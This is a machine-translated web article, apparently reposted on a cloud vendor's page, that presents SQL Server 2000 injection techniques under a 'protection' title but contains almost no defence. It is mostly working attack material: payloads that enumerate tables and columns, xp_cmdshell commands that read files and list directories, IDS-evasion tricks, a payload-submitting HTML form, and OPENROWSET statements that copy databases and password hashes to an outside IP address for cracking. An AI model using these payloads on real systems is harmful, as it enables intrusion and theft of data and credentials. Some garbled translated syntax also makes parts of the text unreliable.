SQL Server 2000 Injection Protection Encyclopedia (ii) Vulnerability Research

Source: Internet
Author: User
Tags hash sql server injection access database

SQL Server 2000 Injection Protection Encyclopedia (ii)

Traditional query constructs:
SELECT * FROM news where id= ... and topic= ... And .....
Admin ' and 1= (select COUNT (*) from [user] where username= ' victim ' and right (left (userpass,01), 1) = ' 1 ') and Userpass <> ;'
Select 123;--
; Use master;--
: A ' or name like ' fff% ';--shows a user named FFFF.
' And 1<> (select count (email) from [user]);--
; Update [users] set email= (select top 1 name from sysobjects where xtype= ' u ' and status>0) where name= ' FFFF ';--

Description
The above statement is to get the first user table in the database and place the table name in the FFFF user's mailbox field.
By looking at FFFF's user profile, you can get the first one to use the table called AD
And then get the ID of this table based on the table name ad
FFFF '; Update [users] set email= (select top 1 id from sysobjects where xtype= ' u ' and name= ' ad ') where name= ' FFFF ';--

You can get the name of the second table as follows.
FFFF '; Update [users] set email= (select top 1 name from sysobjects where xtype= ' u ' and id>581577110) where name= ' FFFF ';- -
FFFF '; Update [users] set email= (select top 1 count (IDs) from password) where name= ' FFFF ';--
FFFF '; Update [users] set email= (select top 1 pwd from password where id=2)
where name= ' FFFF ';--

FFFF '; Update [users] set email= (select top 1 name from password where id=2)
where name= ' FFFF ';--

EXEC master.. Xp_servicecontrol ' start ', ' schedule '
EXEC master.. Xp_servicecontrol ' start ', ' Server '
Sp_addextendedproc ' Xp_webserver ', ' C:\temp\xp_foo.dll '

Extended storage can be invoked in a generic way:
EXEC xp_webserver

Once this extended store has been executed, you can delete it like this:
Sp_dropextendedproc ' Xp_webserver '

Insert into users values (666, char (0x63) +char (0x68) +char (0x72) +
char (0x69) +char (0x73), char (0x63) +char (0x68) +char (0x72) +char (0x69) +char (0x73), 0xFFFF)-

Insert into users values (667,123,123,0XFFFF)-

Insert into users values (123, ' admin '--', ' password ', 0xffff)-

; and user>0
;; and (select COUNT (*) from sysobjects) >0
;; and (select COUNT (*) from mysysobjects) >0//is an Access database

Some introductions that are usually injected:
A id=49 the parameters of this type of injection are numeric, and the SQL statement looks like this:
SELECT * from table name where field =49
The injected parameter is id=49 and [query condition], that is, the build statement:
SELECT * from table name where field =49 and [query criteria]

(B) class= series The parameters of such injections are character types, and the original SQL statements are roughly as follows:
SELECT * from table name where field = ' Soap series '
The injected parameters are the class= series ' and [query conditions] and ' = ', that is, the generated statement:
SELECT * from table name where field = ' serials ' and [query conditions] and ' = '

(C) When the search does not filter the parameters, such as the keyword= keyword, the original SQL statement is roughly as follows:
SELECT * from table name where field like '% keyword% '
The injected parameter is keyword= ' and [query condition] and '%25 ' =, that is, the build statement:
SELECT * from table name where field like '% ' and [query condition] and '% ' = '% '
;; and (select top 1 name from sysobjects where xtype= ' U ' and status>0) >0
sysobjects is a SQL Server system table that stores all table names, views, constraints, and other objects, xtype= ' U ' and status>0, the name of the table that the user creates, and the above statement takes the first table name out and compares it to 0. Let the error message expose the table name.

;; and (select top 1 col_name (object_id (' table name '), 1) from sysobjects) >0
After you get the table name from ⑤, use object_id (' table name ') to get the internal id,col_name (table name id,1) of the table name to represent the 1th field name of the table, and replace 1 with 2,3,4 ... you can get the name of the field in the puzzle sheet one by one.

Post.htm content: The main is to facilitate input.


<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=http://test.com/count.asp target=p>
<input name= "id" value= "1552;update AAA set aaa= (select top 1 name from sysobjects where xtype= ' u ' and status>0);--" style= "width:750" >
<input type=submit value= ">>>" >
<input Type=hidden name=fno value= "2, 3" >
</form>

Name of his data table:
Id=1552;update AAA Set Aaa= (select top 1 name from sysobjects where xtype= ' u ' and status>0);--

This is where the first table name is updated to the AAA field.

read out the first table, and the second table can be read in this way (plus and name<> ' The name of the table ' just obtained) after the condition.
Id=1552;update AAA Set Aaa= (select top 1 name from sysobjects where xtype= ' u ' and status>0 ' name<> ');--

Then id=1552 and exists (SELECT * from AAA where aaa>5)

read out the second table, ^^ ^^ ^^ read each one, until it is not so far.

Read the field like this:
Id=1552;update AAA Set Aaa= (select top 1 col_name (object_id (' table name '), 1);--

Then id=1552 and exists (SELECT * from AAA where aaa>5) error, get field name
Id=1552;update AAA Set Aaa= (select top 1 col_name (object_id (' table name '), 2);--
Then id=1552 and exists (SELECT * from AAA where aaa>5) error, get field name

Advanced Tips:

[Get data table name] [Update the field value to the table name, and then try to read out the value of the field to get the table name]
Update table name Set field = (select top 1 name from sysobjects where xtype=u and status>0 [and name<> ' you get table name ' Find one plus one]) [w Here conditions]
Select top 1 name from sysobjects where Xtype=u and status>0 and name not in (' Table1 ', ' table2 ',...)

Build database administrator account and system administrator account through SQL Server Injection vulnerability [current account must be sysadmin group]

[Get Data table field name] [Update the field value to the field name, and then try to read out the value of the field to get the field name]
Update table name Set field = (select top 1 col_name (object_id (' data table name to query '), field column as: 1) [Where condition]

Bypass IDs detection [using variables]
declare @a sysname set @a= ' xp_ ' + ' Cmdshell ' exec @a ' dir c:\ '
declare @a sysname set @a= ' xp ' + ' _cm ' + ' Dshell ' exec @a ' dir c:\ '

1, open the remote database
Basic syntax
SELECT * FROM OPENROWSET (' SQLOLEDB ', ' server=servername;uid=sa;pwd=apachy_123 ', ' select * FROM table1 ')

Parameters: (1) OLE DB Provider name

2, where the connection string parameter can be any and port used to connect, such as
SELECT * FROM OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from table '

To replicate the entire database of the target host, first set up a connection on the target host to the database on your machine (how to establish a remote connection on the target host, just now), and then insert all the remote tables to the local table.

Basic syntax:
Insert INTO OPENROWSET (' SQLOLEDB ', ' server=servername;uid=sa;pwd=apachy_123 ', ' select * to table1 ') SELECT * FROM Table2

This line of statements copies all the data from the Table2 table on the target host to the Table1 table in the remote database. In practice, the IP address and port of the connection string are appropriately modified to point to where needed, such as:
Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * FROM table1 ') SELECT * from Table2

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=hack3r; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _sysdatabases ')
SELECT * FROM master.dbo.sysdatabases

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=hack3r; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _sysobjects ')
SELECT * FROM User_database.dbo.sysobjects

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _syscolumns ')
SELECT * FROM User_database.dbo.syscolumns

After that, you can see the target host's library structure from the local database, which is a cinch, not to say, to replicate the database:
Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * FROM table1 ') SELECT * from database. Table1

Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from table2 ') SELECT * from database. Table2

......

3. Copy Hassi (HASH)

This is actually an extended application of the above replicated database. The hash of the login password is stored in the sysxlogins. The method is as follows:
Insert INTO OPENROWSET (' SQLOLEDB ', ' uid=sa;pwd=apachy_123; NETWORK=DBMSSOCN; address=202.100.100.1,1433 ', ' select * from _sysxlogins ') SELECT * from Database.dbo.sysxlogins

After the hash is obtained, it can be violently cracked. It takes a bit of luck and a lot of time.

Ways to traverse a directory:
Create a temporary table first: Temp
' 5;create table temp (id nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255));--
5 '; Insert temp exec master.dbo.xp_availablemedia;--get all current drives
5 '; INSERT into temp (ID) Exec master.dbo.xp_subdirs ' c:\ ';--Get subdirectory list
5 '; INSERT into temp (ID,NUM1) exec master.dbo.xp_dirtree ' c:\ ';--Get the directory tree structure of all subdirectories and inch into temp table

5 '; INSERT into temp (ID) Exec master.dbo.xp_cmdshell ' type c:\web\index.asp ';--View the contents of a file
5 '; INSERT into temp (ID) exec master.dbo.xp_cmdshell ' dir c:\ ';--
5 '; INSERT into temp (ID) exec master.dbo.xp_cmdshell ' dir c:\ *.asp/s/a ';--
5 '; INSERT into temp (ID) exec master.dbo.xp_cmdshell ' cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc '

5 '; INSERT into temp (ID,NUM1) exec master.dbo.xp_dirtree ' c:\ ';--(Xp_dirtree applicable permissions public)
Write to table:
Statement 1:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' sysadmin '));--
Statement 2:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' serveradmin '));--
Statement 3:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' setupadmin '));--
Statement 4:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' securityadmin '));--
Statement 5:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' securityadmin '));--
Statement 6:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' diskadmin '));--
Statement 7:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' bulkadmin '));--
Statement 8:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_srvrolemember (' bulkadmin '));--
Statement 9:_blank>http://www.xxxxx.com/down/list.asp?id=1 and 1= (select Is_member (' db_owner '));--
Write the path to the table:
_blank>http://www.xxxxx.com/down/list.asp?id=1;create table dirs (Paths varchar (), id int)-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ' c:\ '-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<> (select top 1 paths from dirs)-
_blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<> (select top 1 paths from dirs where paths not in (' @ Inetpub '))-
Statement: _blank>http://http://www.xxxxx.com/down/list.asp?id=1;create table dirs1 (Paths varchar (), ID int)--
Statement: _blank>http://http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree ' e:\web '--
Statement: _blank>http://http://www.xxxxx.com/down/list.asp?id=1 and 0<> (select top 1 paths from dirs1)-

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.